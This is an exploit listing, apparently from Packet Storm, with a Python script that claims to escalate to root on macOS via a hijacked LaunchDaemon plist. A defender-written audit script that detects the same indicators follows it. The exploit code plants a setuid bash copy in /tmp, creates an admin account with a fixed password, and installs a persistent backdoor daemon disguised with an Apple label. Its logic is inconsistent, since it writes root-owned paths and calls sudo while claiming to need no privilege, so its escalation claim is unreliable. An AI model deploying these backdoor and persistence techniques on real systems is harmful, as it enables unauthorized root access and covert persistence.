macOS / iOS Local Privilege Escalation

Date: 06 Jun 2025 00:00:00
Reported by: Mohammed Idrees Banyamer
Type: packetstorm
Source: packetstorm.news

This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary, creates an admin use...

Code
#!/usr/bin/env python3
# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# Tested on: macOS Sonoma (14.x ARM64 / x86_64)
# CVE: CVE-2025-24085
# Type: Local Privilege Escalation
# Platform: macOS
# Author Country: Jordan
# Description:
# This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute
# arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary,
# creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the
# com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root
# on macOS Sonoma systems.

import os
import plistlib
import time
from pathlib import Path

LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh"

def create_payload():
    print("[+] Creating root payload script...")
    payload = """#!/bin/bash
# Root shell
cp /bin/bash /tmp/.rootbash
chmod +s /tmp/.rootbash
chown root:wheel /tmp/.rootbash

# Add admin user
sysadminctl -addUser pentest -password macOS123! -admin

# Log file
echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog

# Persistent backdoor
cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.backdoor</string>
  <key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
"""
    with open(PAYLOAD_SCRIPT, "w") as f:
        f.write(payload)
    os.chmod(PAYLOAD_SCRIPT, 0o755)

def hijack_launchdaemon():
    print("[+] Hijacking LaunchDaemon plist...")
    if not Path(LAUNCHD_PLIST).exists():
        # create a fake one
        print("[*] Creating fake LaunchDaemon plist for exploitation...")
        plist_data = {
            'Label': 'com.apple.securemonitor',
            'ProgramArguments': [PAYLOAD_SCRIPT],
            'RunAtLoad': True,
        }
        with open(LAUNCHD_PLIST, "wb") as f:
            plistlib.dump(plist_data, f)
    else:
        # hijack existing one
        with open(LAUNCHD_PLIST, 'rb') as f:
            plist = plistlib.load(f)
        plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
        plist['RunAtLoad'] = True
        with open(LAUNCHD_PLIST, 'wb') as f:
            plistlib.dump(plist, f)

    os.system(f"chmod 644 {LAUNCHD_PLIST}")
    os.system(f"chown root:wheel {LAUNCHD_PLIST}")

def trigger_payload():
    print("[+] Triggering LaunchDaemon manually...")
    os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}")
    print("[+] Done. You can now execute /tmp/.rootbash -p for root shell")

def main():
    if os.geteuid() == 0:
        print("[!] You are already root. No need to exploit.")
        return
    create_payload()
    hijack_launchdaemon()
    print("[+] Exploit completed. Reboot or run manually:")
    print(f"    sudo launchctl load -w {LAUNCHD_PLIST}")
    print("    Then run: /tmp/.rootbash -p")

if __name__ == "__main__":
    main()
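The exploit above leaves a recognisable footprint: a LaunchDaemon plist whose Label mimics an Apple daemon (com.apple.securemonitor, com.apple.backdoor) but whose ProgramArguments point at a hidden script under /tmp, plus a setuid copy of bash in /tmp. The following audit script is an added defender-side example written for this page; it is not part of the packetstorm listing or the exploit author's code. It parses LaunchDaemon plists with the standard plistlib module and flags those indicators, and it scans a directory for setuid/setgid files. The path prefixes it treats as "Apple-owned" and "user-writable" are heuristics chosen for this example, and the two embedded plists are constructed samples modelled on the exploit's own plist content.

```python
#!/usr/bin/env python3
"""Audit LaunchDaemon plists and temp directories for the indicators left by a
LaunchDaemon hijack (added example, not part of the original listing)."""
import os
import plistlib
import stat
from pathlib import Path

# Heuristic assumptions for this example: legitimate com.apple.* daemons run
# programs from these roots; nothing a daemon runs should live under these
# user-writable locations.
APPLE_PROGRAM_ROOTS = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")
USER_WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/var/folders/", "/Users/")

# Constructed sample: what the exploit writes to com.apple.securemonitor.plist.
SAMPLE_HIJACKED = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.securemonitor</string>
  <key>ProgramArguments</key><array><string>/tmp/.macroot_payload.sh</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""

# Constructed sample: a benign third-party daemon for comparison.
SAMPLE_BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.example.agent</string>
  <key>ProgramArguments</key><array><string>/usr/local/bin/agent</string><string>--daemon</string></array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""


def audit_plist_bytes(source, data):
    """Return a list of human-readable findings for one plist given as bytes."""
    findings = []
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # plistlib raises InvalidFileException / ExpatError
        return [f"{source}: unparsable plist ({exc})"]

    label = str(plist.get("Label", ""))
    programs = []
    if isinstance(plist.get("Program"), str):
        programs.append(plist["Program"])
    args = plist.get("ProgramArguments")
    if isinstance(args, list) and args and isinstance(args[0], str):
        programs.append(args[0])

    for prog in programs:
        if prog.startswith(USER_WRITABLE_PREFIXES):
            findings.append(f"{source}: program {prog} lives in a user-writable location")
        if os.path.basename(prog).startswith("."):
            findings.append(f"{source}: program {prog} is a hidden dotfile")
        if label.startswith("com.apple.") and not prog.startswith(APPLE_PROGRAM_ROOTS):
            findings.append(f"{source}: label {label} mimics Apple but program {prog} is outside Apple paths")
    return findings


def audit_plist_file(path):
    """Content findings plus ownership/permission findings for one plist on disk."""
    path = Path(path)
    findings = audit_plist_bytes(str(path), path.read_bytes())
    st = path.stat()
    if st.st_uid != 0:
        findings.append(f"{path}: not owned by root (uid {st.st_uid})")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"{path}: group- or world-writable")
    return findings


def audit_directory(directory="/Library/LaunchDaemons"):
    """Map plist path -> findings for every plist in the directory with findings."""
    results = {}
    for plist_path in sorted(Path(directory).glob("*.plist")):
        found = audit_plist_file(plist_path)
        if found:
            results[str(plist_path)] = found
    return results


def find_setuid_files(directory="/tmp"):
    """Regular files with the setuid or setgid bit set, e.g. a copied /tmp/.rootbash."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            full = os.path.join(root, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append(full)
    return hits


if __name__ == "__main__":
    for src, data in (("constructed-hijacked", SAMPLE_HIJACKED), ("constructed-benign", SAMPLE_BENIGN)):
        print(src, audit_plist_bytes(src, data))
    if os.path.isdir("/Library/LaunchDaemons"):
        for path, found in audit_directory().items():
            print(path, found)
        print("setuid/setgid files under /tmp:", find_setuid_files("/tmp"))
```

Run on a macOS host, the script lists any daemon plist that executes from a user-writable path, carries a com.apple.* label while pointing outside Apple's program roots, or is writable by non-root users, and separately reports setuid copies of binaries under /tmp. The ownership and permission checks matter because a daemon plist that a standard user can modify is exactly the precondition the exploit's description relies on.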


Scores (current as of 06 Jun 2025 00:00):
Risk: 8.2 (High)
Vulners AI Score: 8.2
CVSS 3.1: 7.8
EPSS: 0.13072